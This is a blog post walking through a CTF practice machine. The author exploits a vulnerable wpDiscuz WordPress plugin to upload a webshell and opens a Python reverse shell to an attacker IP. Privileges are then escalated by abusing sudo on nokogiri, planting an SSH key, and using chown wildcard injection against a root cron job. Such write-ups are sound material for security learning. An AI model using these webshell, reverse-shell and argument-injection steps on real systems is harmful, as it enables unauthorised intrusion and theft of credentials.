Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Beloved Walkthrough(chown wildcard injection)

HackMyVm Beloved Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan for open ports.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is wordpress.  Add beloved to /etc/hosts. Search for vulnerabilities.

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log 
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search exp for wpdiscuz.

 ~ searchsploit wpdiscuz                                                              fish-0 | 0 [21:19:28]
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ --------------------------------

Run the POC code.

 ~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/                                                                                                                                bash-0 | 0 [12:17:55]
 ---------------------------------------------------------------
 [-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
 [-] File Upload Bypass Vulnerability - PHP Webshell Upload
 [-] CVE: CVE-2020-24186
 [-] https://github.com/hevox
 ---------------------------------------------------------------
 
 [+] Response length:[51680] | code:[200]
 [!] Got wmuSecurity value: 9c794f21e7
 [!] Got wmuSecurity value: 1
 
 [+] Generating random name for Webshell...
 [!] Generated webshell name: bhgnpbentfvkgzh
 
 [!] Trying to Upload Webshell..
 [+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php"

Visit the webshell, listen to port 1234, we can get a reverseshell.

 http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

Check sudo -l.

 www-data@beloved:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on beloved:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on beloved:
     (beloved) NOPASSWD: /usr/local/bin/nokogiri

The nokogiri will activate an ruby shell, but the trick is to add an extra parameter for log file.

 www-data@beloved:/$ touch /tmp/log.txt                     
 touch /tmp/log.txt
 www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 Your document is stored in @doc...
 Switch to inspect mode.
 system 'id'
 system 'id'
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
 system '/bin/bash'
 
 

Now we are beloved. We upload id_rsa.pub, change to authorzied_keys, to get ssh access.

 cd .ssh                                                                                                   
 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 --2021-07-02 06:44:36--  http://192.168.56.150/id_rsa.pub
 Connecting to 192.168.56.150:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 565 [application/x-mspublisher]
 Saving to: ‘authorized_keys’
 ...
 chmod 600 authorized_keys

Ssh login as beloved.

 ~ ssh beloved@192.168.56.100
 ...
 beloved@beloved:~$ id
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)

Check pspy64.

 2021/07/02 06:47:01 CMD: UID=0    PID=1878   | /usr/sbin/CRON -f 
 2021/07/02 06:47:01 CMD: UID=0    PID=1879   | /bin/sh -c cd /opt && chown root:root *

In /opt, there is only a id_rsa. Maybe it's private key for user root. We need to make it readable for user beloved.

 beloved@beloved:/$ ls -la opt
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
 drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
 -rw-------  1 root    root    1823 Jun 27 16:41 id_rsa

Use the chown wildcard vulnerability. See the article here.

 beloved@beloved:/opt$ touch ref
 beloved@beloved:/opt$ touch -- --reference=ref

Wait a minute, the id_rsa has been changed to user beloved, which is the owner of file ref.

 beloved@beloved:/opt$ ls -la
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:59  .
 drwxr-xr-x 18 root    root    4096 May 19 10:09  ..
 -rw-------  1 beloved beloved 1823 Jun 27 16:41  id_rsa
 -rw-r--r--  1 beloved beloved    0 Jul  2 06:58  ref
 -rw-r--r--  1 beloved beloved    0 Jul  2 06:59 '--reference=ref'  

Read id_rsa, then we can login ssh as root.

 ~ ssh root@192.168.56.100 -i key                                                                         ...
 root@beloved:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 beloved




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1